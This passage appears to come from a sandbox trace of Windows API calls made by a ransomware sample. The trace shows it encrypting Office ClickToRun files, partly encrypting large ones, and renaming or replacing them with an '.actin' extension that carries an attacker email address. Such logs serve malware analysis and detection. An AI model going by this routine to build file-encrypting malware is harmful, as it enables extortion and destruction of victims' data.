(normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\apiclient.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0142.638] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=162880) returned 1 [0142.638] CloseHandle (hObject=0x2f4) returned 1 [0142.638] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ApiClient.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\apiclient.dll")) returned 0x20 [0142.638] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ApiClient.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\apiclient.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0142.638] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ApiClient.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\apiclient.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0142.639] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0142.639] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVCatalog.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcatalog.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0142.639] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=656088) returned 1 [0142.639] CloseHandle (hObject=0x2f4) returned 1 [0142.639] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVCatalog.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcatalog.dll")) returned 0x20 [0142.639] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVCatalog.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcatalog.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0142.639] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVCatalog.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcatalog.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0142.639] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0142.639] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcleaner.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0142.639] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=2054872) returned 1 [0142.639] CloseHandle (hObject=0x2f4) returned 1 [0142.640] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcleaner.exe")) returned 0x20 [0142.640] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcleaner.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcleaner.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 1 [0142.640] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcleaner.exe.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0142.640] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af910 | out: lpNewFilePointer=0x0) returned 1 [0142.640] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af910 | out: lpNewFilePointer=0x0) returned 1 [0142.641] ReadFile (in: hFile=0x2f4, lpBuffer=0x3675058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32af91c, lpOverlapped=0x0 | out: lpBuffer=0x3675058*, lpNumberOfBytesRead=0x32af91c*=0x40000, lpOverlapped=0x0) returned 1 [0142.940] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0xa739d, lpNewFilePointer=0x0, dwMoveMethod=0x32af910 | out: lpNewFilePointer=0x0) returned 1 [0142.941] ReadFile (in: hFile=0x2f4, lpBuffer=0x36b5058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32af91c, lpOverlapped=0x0 | out: lpBuffer=0x36b5058*, lpNumberOfBytesRead=0x32af91c*=0x40000, lpOverlapped=0x0) returned 1 [0142.946] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x1b5ad8, lpNewFilePointer=0x0, dwMoveMethod=0x32af910 | out: lpNewFilePointer=0x0) returned 1 [0142.946] ReadFile (in: hFile=0x2f4, lpBuffer=0x36f5058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32af91c, lpOverlapped=0x0 | out: lpBuffer=0x36f5058*, lpNumberOfBytesRead=0x32af91c*=0x40000, lpOverlapped=0x0) returned 1 [0142.954] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af900, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af96c | out: phKey=0x32af96c*=0xac31f0) returned 1 [0142.954] CryptSetKeyParam (hKey=0xac31f0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0142.954] CryptEncrypt (in: hKey=0xac31f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af920*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x3675020*, pdwDataLen=0x32af920*=0xc0060) returned 1 [0142.956] CryptDestroyKey (hKey=0xac31f0) returned 1 [0142.956] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af948 | out: lpNewFilePointer=0x0) returned 1 [0142.956] WriteFile (in: hFile=0x2f4, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x32af958, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af958*=0xc0112, lpOverlapped=0x0) returned 1 [0143.294] SetEndOfFile (hFile=0x2f4) returned 1 [0143.295] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x1b5ad8, lpNewFilePointer=0x0, dwMoveMethod=0x32af918 | out: lpNewFilePointer=0x0) returned 1 [0143.295] WriteFile (in: hFile=0x2f4, lpBuffer=0x373514a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32af924, lpOverlapped=0x0 | out: lpBuffer=0x373514a*, lpNumberOfBytesWritten=0x32af924*=0x40000, lpOverlapped=0x0) returned 1 [0143.297] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0xa739d, lpNewFilePointer=0x0, dwMoveMethod=0x32af918 | out: lpNewFilePointer=0x0) returned 1 [0143.297] WriteFile (in: hFile=0x2f4, lpBuffer=0x373514a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32af924, lpOverlapped=0x0 | out: lpBuffer=0x373514a*, lpNumberOfBytesWritten=0x32af924*=0x40000, lpOverlapped=0x0) returned 1 [0143.299] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af918 | out: lpNewFilePointer=0x0) returned 1 [0143.299] WriteFile (in: hFile=0x2f4, lpBuffer=0x373514a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32af924, lpOverlapped=0x0 | out: lpBuffer=0x373514a*, lpNumberOfBytesWritten=0x32af924*=0x40000, lpOverlapped=0x0) returned 1 [0143.300] CloseHandle (hObject=0x2f4) returned 1 [0143.913] SetEvent (hEvent=0x288) returned 1 [0143.914] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0143.914] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0143.914] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=2285736) returned 1 [0143.914] CloseHandle (hObject=0x2f4) returned 1 [0143.914] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll")) returned 0x20 [0143.914] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 1 [0143.915] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0143.916] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af910 | out: lpNewFilePointer=0x0) returned 1 [0143.916] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af910 | out: lpNewFilePointer=0x0) returned 1 [0143.916] ReadFile (in: hFile=0x2f4, lpBuffer=0x3675058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32af91c, lpOverlapped=0x0 | out: lpBuffer=0x3675058*, lpNumberOfBytesRead=0x32af91c*=0x40000, lpOverlapped=0x0) returned 1 [0143.926] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0xba038, lpNewFilePointer=0x0, dwMoveMethod=0x32af910 | out: lpNewFilePointer=0x0) returned 1 [0143.926] ReadFile (in: hFile=0x2f4, lpBuffer=0x36b5058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32af91c, lpOverlapped=0x0 | out: lpBuffer=0x36b5058*, lpNumberOfBytesRead=0x32af91c*=0x40000, lpOverlapped=0x0) returned 1 [0143.933] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x1ee0a8, lpNewFilePointer=0x0, dwMoveMethod=0x32af910 | out: lpNewFilePointer=0x0) returned 1 [0143.933] ReadFile (in: hFile=0x2f4, lpBuffer=0x36f5058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32af91c, lpOverlapped=0x0 | out: lpBuffer=0x36f5058*, lpNumberOfBytesRead=0x32af91c*=0x40000, lpOverlapped=0x0) returned 1 [0144.241] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af900, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af96c | out: phKey=0x32af96c*=0xac2eb0) returned 1 [0144.241] CryptSetKeyParam (hKey=0xac2eb0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0144.242] CryptEncrypt (in: hKey=0xac2eb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af920*=0xc0070, dwBufLen=0xc0070 | out: pbData=0x3675020*, pdwDataLen=0x32af920*=0xc0070) returned 1 [0144.243] CryptDestroyKey (hKey=0xac2eb0) returned 1 [0144.243] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af948 | out: lpNewFilePointer=0x0) returned 1 [0144.243] WriteFile (in: hFile=0x2f4, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xc0122, lpNumberOfBytesWritten=0x32af958, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af958*=0xc0122, lpOverlapped=0x0) returned 1 [0144.257] SetEndOfFile (hFile=0x2f4) returned 1 [0144.257] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x1ee0a8, lpNewFilePointer=0x0, dwMoveMethod=0x32af918 | out: lpNewFilePointer=0x0) returned 1 [0144.257] WriteFile (in: hFile=0x2f4, lpBuffer=0x373515a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32af924, lpOverlapped=0x0 | out: lpBuffer=0x373515a*, lpNumberOfBytesWritten=0x32af924*=0x40000, lpOverlapped=0x0) returned 1 [0144.259] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0xba038, lpNewFilePointer=0x0, dwMoveMethod=0x32af918 | out: lpNewFilePointer=0x0) returned 1 [0144.259] WriteFile (in: hFile=0x2f4, lpBuffer=0x373515a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32af924, lpOverlapped=0x0 | out: lpBuffer=0x373515a*, lpNumberOfBytesWritten=0x32af924*=0x40000, lpOverlapped=0x0) returned 1 [0144.261] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af918 | out: lpNewFilePointer=0x0) returned 1 [0144.261] WriteFile (in: hFile=0x2f4, lpBuffer=0x373515a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32af924, lpOverlapped=0x0 | out: lpBuffer=0x373515a*, lpNumberOfBytesWritten=0x32af924*=0x40000, lpOverlapped=0x0) returned 1 [0144.262] CloseHandle (hObject=0x2f4) returned 1 [0144.598] SetEvent (hEvent=0x288) returned 1 [0144.599] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0144.599] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvshnotify.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0144.599] GetFileSizeEx (in: hFile=0x2d8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=263896) returned 1 [0144.599] CloseHandle (hObject=0x2d8) returned 1 [0144.600] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvshnotify.exe")) returned 0x20 [0144.600] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvshnotify.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0144.600] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvshnotify.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0144.600] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0144.600] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0144.600] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvshnotify.exe.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0144.600] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac3370) returned 1 [0144.600] CryptSetKeyParam (hKey=0xac3370, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0144.600] ReadFile (in: hFile=0x2d8, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x406d8, lpOverlapped=0x0) returned 1 [0144.607] CryptEncrypt (in: hKey=0xac3370, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x406e0, dwBufLen=0x406e0 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x406e0) returned 1 [0144.607] WriteFile (in: hFile=0x2f4, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x406e0, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x406e0, lpOverlapped=0x0) returned 1 [0144.612] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac3070) returned 1 [0144.612] CryptSetKeyParam (hKey=0xac3070, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0144.612] CryptEncrypt (in: hKey=0xac3070, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x50, dwBufLen=0x50 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x50) returned 1 [0144.612] CryptDestroyKey (hKey=0xac3070) returned 1 [0144.612] WriteFile (in: hFile=0x2f4, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x102, lpOverlapped=0x0) returned 1 [0144.613] CryptDestroyKey (hKey=0xac3370) returned 1 [0144.613] CloseHandle (hObject=0x2d8) returned 1 [0144.613] CloseHandle (hObject=0x2f4) returned 1 [0144.613] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvshnotify.exe")) returned 1 [0144.616] SetEvent (hEvent=0x288) returned 1 [0144.905] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0144.905] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0144.906] GetFileSizeEx (in: hFile=0x2d8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=820416) returned 1 [0144.906] CloseHandle (hObject=0x2d8) returned 1 [0144.906] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll")) returned 0x20 [0144.906] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0144.906] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0144.906] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0144.906] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0144.906] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0144.906] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac3330) returned 1 [0144.906] CryptSetKeyParam (hKey=0xac3330, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0144.907] ReadFile (in: hFile=0x2d8, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0xc84c0, lpOverlapped=0x0) returned 1 [0144.923] CryptEncrypt (in: hKey=0xac3330, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0xc84d0, dwBufLen=0xc84d0 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0xc84d0) returned 1 [0144.924] WriteFile (in: hFile=0x2f0, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xc84d0, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xc84d0, lpOverlapped=0x0) returned 1 [0144.942] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac3130) returned 1 [0144.942] CryptSetKeyParam (hKey=0xac3130, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0144.942] CryptEncrypt (in: hKey=0xac3130, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x40, dwBufLen=0x40 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x40) returned 1 [0144.942] CryptDestroyKey (hKey=0xac3130) returned 1 [0144.942] WriteFile (in: hFile=0x2f0, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xf2, lpOverlapped=0x0) returned 1 [0144.942] CryptDestroyKey (hKey=0xac3330) returned 1 [0144.942] CloseHandle (hObject=0x2d8) returned 1 [0144.942] CloseHandle (hObject=0x2f0) returned 1 [0144.942] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll")) returned 1 [0144.949] SetEvent (hEvent=0x288) returned 1 [0145.234] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0145.234] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rheartbeatconfig.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0145.438] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=4136) returned 1 [0145.438] CloseHandle (hObject=0x2f0) returned 1 [0145.438] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rheartbeatconfig.xml")) returned 0x20 [0145.438] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rheartbeatconfig.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0145.438] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rheartbeatconfig.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0145.438] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0145.438] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0145.438] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rheartbeatconfig.xml.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0145.439] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac2df0) returned 1 [0145.439] CryptSetKeyParam (hKey=0xac2df0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0145.439] ReadFile (in: hFile=0x2f0, 